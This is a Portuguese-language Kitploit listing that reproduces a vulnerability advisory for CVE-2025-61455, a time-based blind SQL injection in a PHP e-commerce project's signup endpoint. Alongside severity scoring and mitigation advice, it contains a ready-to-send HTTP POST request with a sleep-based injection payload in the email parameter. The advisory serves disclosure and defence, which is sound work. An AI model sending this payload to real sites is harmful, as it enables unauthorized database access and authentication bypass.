Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/tansique-17/cve-2025-61455
Análise de VulnerabilidadesExploraçãoSegurança WebAprendizado e EducaçãoRecursos Curados
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

Divulgação pública e prova de conceito para CVE-2025-61455, uma injeção SQL crítica no E-commerce Project v1.0, incluindo detalhes técnicos, PoC e recomendações de mitigação.

Ver RepositórioSite
9há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ Divulgação de CVE: CVE-2025-61455 — Injeção de SQL em Projeto de E-commerce

Data de Divulgação: 14 de outubro de 2025
ID do CVE: CVE-2025-61455
Gravidade: CRÍTICA (CVSS 9.8)


🧩 Resumo

Existe uma vulnerabilidade crítica de Injeção de SQL no E-commerce Project v1.0, especificamente no endpoint signup.inc.php. A aplicação incorpora diretamente entradas de usuário não sanitizadas em consultas SQL, permitindo que atacantes não autenticados contornem a autenticação e executem comandos SQL arbitrários.

Este problema recebeu o identificador CVE-2025-61455. No momento da divulgação pública, nenhuma correção oficial estava disponível.


📦 Produto Afetado

  • Fornecedor: Independente (Bhabishya-123)
  • Projeto: E-commerce
  • Versão: v1.0
  • Arquivo: signup.inc.php
  • Endpoint Vulnerável:
    https://localhost/e-commerce-main/includes/signup.inc.php

🔬 Detalhes da Vulnerabilidade

A aplicação usa entrada não sanitizada diretamente em consultas SQL, sem qualquer validação de entrada ou declarações preparadas. A vulnerabilidade existe no parâmetro aid do arquivo signup.inc.php.

Um atacante pode injetar código SQL malicioso através do parâmetro de e-mail, permitindo ataques de injeção de SQL cega baseada em tempo.

Exemplo de padrão de código vulnerável:

$query = "SELECT * FROM table WHERE email='$email'";

Isso permite payloads de injeção que podem manipular a lógica da consulta e extrair dados sensíveis.


📌 Classificação CWE

ID CWETítulo
CWE-89Neutralização Incorreta de Elementos Especiais usados em um Comando SQL

📊 Pontuação CVSS v3.1

PontuaçãoGravidadeString do Vetor
9.8CRÍTICACVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

💥 Impacto

Uma exploração bem-sucedida pode resultar em:

  • ✅ Contorno de autenticação completo
  • 🔓 Acesso não autorizado a recursos privilegiados
  • 📊 Exfiltração de dados através de injeção de SQL cega baseada em tempo
  • 🛠️ Potencial manipulação ou exclusão de dados
  • ⚠️ Comprometimento total do banco de dados backend
  • 💻 Potencial para execução remota de código

🧪 Prova de Conceito (PoC)

1. Clonar o Repositório

git clone https://github.com/Bhabishya-123/E-commerce.git

2. Hospedar Localmente

Use XAMPP/LAMP para implantar o projeto e navegue até:

http://localhost/e-commerce-main/includes/signup.inc.php

3. Injeção de Payload

Envie a seguinte solicitação HTTP maliciosa:

POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=

Explicação:
O parâmetro de e-mail contém um payload de injeção de SQL baseada em tempo: '+(select*from(select(sleep(20)))a)+'

Se a aplicação atrasar a resposta em 20 segundos, a injeção de SQL foi bem-sucedida.


🔐 Recomendações

  • ✅ Substitua consultas SQL dinâmicas por declarações preparadas (mysqli_prepare() ou PDO).
  • 🔍 Realize validação e sanitização de entrada para todas as entradas de usuário.
  • 🧱 Implante um Firewall de Aplicação Web (WAF) para bloquear padrões conhecidos de injeção de SQL.
  • 🛡️ Conduza auditorias de código regulares e testes de penetração para detecção precoce.
  • 🔒 Implemente consultas parametrizadas para todas as interações com o banco de dados.
  • 📝 Use listas de permissões para validação de entrada sempre que possível.

📆 Cronograma

EventoData
Vulnerabilidade Descoberta16 de setembro de 2025
Divulgação Pública13 de outubro de 2025
Correção Disponível❌ Não disponível na data da divulgação

🙋‍♂️ Créditos

Esta vulnerabilidade foi descoberta e divulgada de forma responsável por:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 Referências

  • OWASP - Injeção de SQL
  • PortSwigger - Injeção de SQL
  • CVE-2025-61455 no CVE.org

💬 Este aviso é publicado de forma independente devido à falta de resposta do fornecedor.

Baixar ferramenta